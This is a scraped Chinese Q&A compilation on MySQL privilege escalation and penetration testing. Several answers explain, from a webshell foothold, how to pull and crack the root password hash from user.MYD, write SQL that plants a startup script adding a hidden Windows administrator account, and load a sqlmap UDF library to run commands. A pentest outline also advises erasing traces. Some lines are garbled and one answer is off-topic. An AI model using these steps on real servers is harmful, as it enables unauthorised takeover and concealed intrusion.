㈠ 如何通過mysql提權獲得flag值
利用mysql提權的前提就是,伺服器安裝了mysql,mysql的服務沒有降權,(降權也可以提,沒降權的話就最好了),是默認安裝以系統許可權繼承的(system許可權). 並且獲得了root的賬號密碼
先來說說我是咋判斷一台windows伺服器上的mysql有沒有降權的. 0.0如果能運行cmd的話,我會先看看有啥用戶先,如果有mysql mssql這樣用戶名,或者類似的.我就會猜測他的mssql服務或者mysql的已經被降權運行了.但並不代表不能提權,只要能運行cmd..
接著說一下,判斷伺服器上是否開啟了mysql服務. 一般在拿到webshell的時候,都會掃描一下埠,如果開啟了3306埠的話,我會telnet 過去看看- -.忘了有無回顯~(提權的時候,大多數 3306埠的都是不支持外鏈的.呃,我遇到的大多數是這樣, 有root可以開啟外鏈.) 當然也有一些管理員會把mysql的默認埠改掉.另外一個判斷的方法就是網站是否支持php,一般支持php的網站都用mysql資料庫的.php+mysql啊,好基友啊好麗友- -~(當然,也有一些網站用其他的一些更專業的資料庫).
再說說如何查找mysql root的密碼.
MYSQL所有設置默認都保存在「C:\Program Files\MYSQL\MYSQL Server 5.0\data\MYSQL」中,也就是安裝程序的data目錄下,如圖2所示,有關用戶一共有三個文件即user.frm、user.MYD和 user.MYI,MYSQL資料庫用戶密碼都保存在user.MYD文件中,包括root用戶和其他用戶的密碼。
User.frm user.myd User.myi
這幾個文件.在webshell下,下載下來,解密.用c32asm或者其他的一些文本編輯器user.MYD打開.
A30F80616A023BDFC9
復制到cmd5.com那查一下,或者用cain爆破一下.
打開後使用二進制模式進行查看,如圖所示,可以看到在root用戶後面是一串字元串,選中這些字元串將其復制到記事本中,這些字元串即為用戶加密值,即A30F80616A023BDFC9 。
具體使用cain破解的,我這就不演示了
還有一個查找的方法就是,一些php網站安裝的時候用的是root用戶,例如dedecms,他資料庫安裝的信息就是寫在data/common.inc.php
㈡ 網站滲透測試,怎麼進行
1.信息收集:
1)、獲取域名的whois信息,獲取注冊者郵箱姓名電話等。
2)、查詢伺服器旁站以及子域名站點,因為主站一般比較難,所以先看看旁站有沒有通用性的cms或者其他漏洞。
3)、查看伺服器操作系統版本,web中間件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。
4)、查看IP,進行IP地址埠掃描,對響應的埠進行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等。
5)、掃描網站目錄結構,看看是否可以遍歷目錄,或者敏感文件泄漏,比如php探針。
6)、google hack 進一步探測網站的信息,後台,敏感文件。
2.漏洞掃描:
開始檢測漏洞,如XSS,XSRF,sql注入,代碼執行,命令執行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含, 遠程命令執行,弱口令,上傳,編輯器漏洞,暴力破解等。
3.漏洞利用:
利用以上的方式拿到webshell,或者其他許可權。
4.許可權提升:
提權伺服器,比如windows下mysql的udf提權,serv-u提權,windows低版本的漏洞,如iis6,pr,巴西烤肉, linux藏牛漏洞,linux內核版本漏洞提權,linux下的mysql system提權以及oracle低許可權提權。
5.日誌清理:
結束滲透測試工作需要做的事情,抹除自己的痕跡。
需要規避的風險:
1. 不執行任何可能引起業務中斷的攻擊(包括資源耗竭型DoS,畸形報文攻擊,數據破壞)。
2. 測試驗證時間放在業務量最小的時間進行。
3. 測試執行前確保相關數據進行備份
4. 所有測試在執行前和維護人員進行溝通確認。
㈢ Mysql用戶提權問題
UPDATE `mysql`.`user` SET `Event_priv` = 'Y' WHERE `user`.`User`= 』root『 AND `user`.`Host`= 』%『;
完了後再,
FLUSH PRIVILEGES;
這種情況你最好專門為遠程登陸建一個帳號,主要是為了安全。
㈣ mysql安全模式怎麼提權
mysql 5.1版本以上,必須把udf文件放到mysql安裝目錄下的lib/plugin下才能創建自定義函數,mysql into mpfile並不能創建文件夾,所以mysql 5.1以上的版本,root許可權提權就很困難了,目前已有的方法只有寫啟動項如下:
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user 007hack.com qwer1234!@#$qwe /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 007hack.com /add"",0) " );
㈤ mysql 不在c盤 udf 提權嗎
首先登陸 mysql: >mysql -u root -p
然後查看是否啟用了日誌
mysql>show variables like 'log_?39;;
查看當前的日誌
mysql> show master status;
你需要知道的mysql的日誌類型:
錯誤日誌: -log-err
查詢日誌: -log
慢查詢日誌: -log-slow-queries
更新日誌: -log-update
二進制日誌: -log-bin
修改配置(以下為日誌文件保存位置)
[mysqld]
log=/var/log/mysqld_common.log
log-error=/var/log/mysqld_err.log
log-bin=/var/log/mysqld_bin.bin
㈥ 怎麼在Windows下的MYSQL網站利用UDF.dll提權
udf.dll提權在MySQL版本大於5.0會有很多限制,因為導出udf.dll目錄到winnt目錄已經不行。好在還有方法, http://www.fuxkit.com/index.php/blog/archive/mysql-into-start-directory/,t00ls轉載的,udf.dll失敗時可以考慮試試^_^
㈦ linux mysql udf提權漏洞怎麼辦
在mysql庫下必須有func表,並且在‑‑skip‑grant‑tables開啟的情況下,UDF會被禁止;
過程: 得到插件庫路徑 找對應操作系統的udf庫文件 利用udf庫文件載入函數並執行命令
1,得到插件庫路徑
?
1
2
3
4
5
6
7
mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value |
+---------------+-----------------------+
| plugin_dir | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)
2,找對應操作系統的udf庫文件
因為自己測試,看了下自己系統的版本,64位
?
1
2
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
對於udf文件,在sqlmap工具中自帶就有,只要找對應操作系統的版本即可
?
1
2
3
4
5
6
root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so
3,利用udf庫文件載入函數並執行命令
首先要得到udf庫文件的十六進制格式,可在本地通過
㈧ 已經進入了後台,可是提權的時候有點不順利。請問查看Mysql資料庫的帳戶密碼在哪些文件里啊
看是什麼資料庫啊,如果是本地文件庫,一般在以db結尾的就是。
㈨ mysql能用linux系統用戶嗎
首先建立一個系統賬戶用戶,例如 aiya,並禁止bash登錄。設置noshell。
然後修改mysqld.cnf文件,這個文件具體看不同發行版,例如Ubuntu 18以上,在
/etc/mysql/mysql.conf.d/mysqld.cnf
找到配置文件中[mysqld]小節,在其中有一行:
user = mysql
改成
user = aiya
保存後退出,重啟mysql服務就可以了。
但是請記住,SeLinux和AppArmor會禁止很多東西,你需要修改SeLinux、AppArmor,允許aiya賬戶訪問mysql的數據data目錄以及其他許可權。如果啟動mysql服務出錯,請查看mysql日誌吧,坑比較多。
如果你使用系統自帶的apt install mysql-server指令安裝的話,那麼mysql server默認就是用單獨的【mysql】賬戶運行的,不會有root提權問題。
㈩ linux+mysql怎麼提權
據我所知mysql沒有管理賬號這樣的概念,只有不同的用戶許可權。默認root用戶就具有所有的許可權,你可以新建一個用戶,使它擁有所有的許可權,還可以指定從什麼地方登陸。許可權劃分可以很細的,可以精確到table,像select這種簡單的查看功能命令都可以限定。具體命令像create,grant等等可以找本書看看。希望help you。reference51cto,365testing